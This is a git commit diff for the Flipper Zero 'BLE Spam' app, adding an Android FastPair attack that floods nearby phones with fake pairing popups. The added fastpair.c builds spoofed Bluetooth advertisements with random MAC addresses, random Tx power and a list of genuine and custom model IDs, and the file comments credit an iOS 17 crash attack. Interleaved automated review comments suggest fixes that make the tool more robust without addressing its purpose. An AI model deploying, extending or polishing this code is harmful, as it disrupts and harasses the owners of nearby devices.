BLE Spam add Android FastPair spam

Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com>
Willy-JL
2023-10-15 18:53:31 +01:00
parent 0465f3ca31
commit 74c3ab88d9
7 changed files with 103 additions and 3 deletions


@@ -6,7 +6,7 @@ App(
stack_size=4 * 1024, stack_size=4 * 1024,
fap_icon="ble_spam_10px.png", fap_icon="ble_spam_10px.png",
fap_category="Bluetooth", fap_category="Bluetooth",
fap_author="@Willy-JL & @ECTO-1A", fap_author="@Willy-JL @ECTO-1A @Spooks4576",
fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam",
fap_version="2.0", fap_version="2.0",
fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications",


@@ -7,7 +7,8 @@
// Hacked together by @Willy-JL // Hacked together by @Willy-JL
// Custom adv API by @Willy-JL (idea by @xMasterX) // Custom adv API by @Willy-JL (idea by @xMasterX)
// iOS 17 Crash by @ECTO-1A // iOS 17 Crash by @ECTO-1A
// Research on behaviors and parameters by @Willy-JL and @ECTO-1A // Android Pairs by @Spooks4576 and @ECTO-1A
// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
typedef struct { typedef struct {
@@ -84,6 +85,19 @@ static Attack attacks[] = {
}, },
}, },
}, },
{
.title = "Android Device Pair",
.text = "~15min cooldown, long range",
.payload =
{
.random_mac = true,
.protocol = &ble_spam_protocol_fastpair,
.msg =
{
.fastpair = {},
},
},
},
}; };
#define ATTACK_COUNT ((signed)COUNT_OF(attacks)) #define ATTACK_COUNT ((signed)COUNT_OF(attacks))
@@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
AlignTop, AlignTop,
"App+Spam: \e#WillyJL\e# XFW\n" "App+Spam: \e#WillyJL\e# XFW\n"
"Apple+Crash: \e#ECTO-1A\e#\n" "Apple+Crash: \e#ECTO-1A\e#\n"
"\n" "Android: \e#Spooks4576\e#\n"
" Version \e#2.0\e#", " Version \e#2.0\e#",
false); false);
break; break;
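Review bot: The new "Android Device Pair" entry initializes its message with `.fastpair = {}`, an empty initializer that ISO C accepts only from C23 on; `.fastpair = {0}` is the portable spelling and shows that `model_id` is left at zero on purpose. Going by the fastpair.c added in this commit, a zero `model_id` is the sentinel for choosing a model at random, so a short comment beside it such as `// model_id 0: picked at random per packet` would make the entry self-explanatory. The `attacks[]` array begins outside the hunk, so whether the existing entries already use `{}` is not visible here.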

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.0 KiB


@@ -2,6 +2,7 @@
const BleSpamProtocol* ble_spam_protocols[] = { const BleSpamProtocol* ble_spam_protocols[] = {
&ble_spam_protocol_continuity, &ble_spam_protocol_continuity,
&ble_spam_protocol_fastpair,
}; };
const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols);


@@ -1,9 +1,11 @@
#pragma once #pragma once
#include "continuity.h" #include "continuity.h"
#include "fastpair.h"
union BleSpamMsg { union BleSpamMsg {
ContinuityMsg continuity; ContinuityMsg continuity;
FastpairMsg fastpair;
}; };
extern const BleSpamProtocol* ble_spam_protocols[]; extern const BleSpamProtocol* ble_spam_protocols[];


@@ -0,0 +1,72 @@
#include "fastpair.h"
#include "_registry.h"
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
const char* fastpair_get_name(const BleSpamMsg* _msg) {
const FastpairMsg* msg = &_msg->fastpair;
UNUSED(msg);
return "FastPair";
}
void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
uint32_t model_id;
if(msg && msg->model_id != 0x000000) {
model_id = msg->model_id;
} else {
const uint32_t models[] = {
// Genuine devices
0xCD8256, // Bose NC 700
0xF52494, // JBL Buds Pro
0x718FA4, // JBL Live 300TWS
0x821F66, // JBL Flip 6
0x92BBBD, // Pixel Buds
// Custom debug popups
0xAA1FE1, // ClownMaster
0xAA187F, // VBucks
0xF38C02, // Boykisser
0x1448C9, // BLM
0xD5AB33, // Xtreme
0x13B39D, // Talking Sasquach
};
model_id = models[rand() % COUNT_OF(models)];
}
uint8_t size = 17;
uint8_t* packet = malloc(size);
uint8_t i = 0;
packet[i++] = 2; // Size
packet[i++] = 0x01; // AD Type (Flags)
packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED
packet[i++] = 3; // Size
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID
packet[i++] = (model_id >> 0x08) & 0xFF; // ...
packet[i++] = (model_id >> 0x00) & 0xFF; // ...
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
*out_size = size;
*out_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_fastpair = {
.icon = &I_android,
.get_name = fastpair_get_name,
.make_packet = fastpair_make_packet,
};
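Review bot: In `fastpair_make_packet` the allocation size is the literal `17` while the writes are counted separately by `i`, so nothing ties the two together and a later edit that appends another AD field would silently write past the heap buffer. A check derived from the index, e.g. `furi_assert(i == size);` just before `*out_size = size;`, would catch that (assuming furi's assert is reachable through `_base.h`, which is not shown). The Tx power comment says "-100 to +20 dBm", but `(rand() % 120) - 100` yields -100 to +19, so the comment should be corrected. `fastpair_get_name` also forms `&_msg->fastpair` without the NULL guard that `fastpair_make_packet` applies; since the result is unused, `UNUSED(_msg);` alone would be enough.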


@@ -0,0 +1,11 @@
#pragma once
#include "_base.h"
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
typedef struct {
uint32_t model_id;
} FastpairMsg;
extern const BleSpamProtocol ble_spam_protocol_fastpair;
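Review bot: The `model_id` field of `FastpairMsg` carries no comment, yet the implementation in this commit treats it specially: only the low 24 bits are serialized and `0x000000` means "pick one from the built-in list". Stating that on the field, e.g. `uint32_t model_id; // 24-bit Fast Pair model ID, 0 = random from built-in list`, saves readers a trip to fastpair.c. A line next to `ble_spam_protocol_fastpair` noting that `make_packet` hands back a `malloc`ed buffer, which the caller presumably has to free, would document the ownership as well.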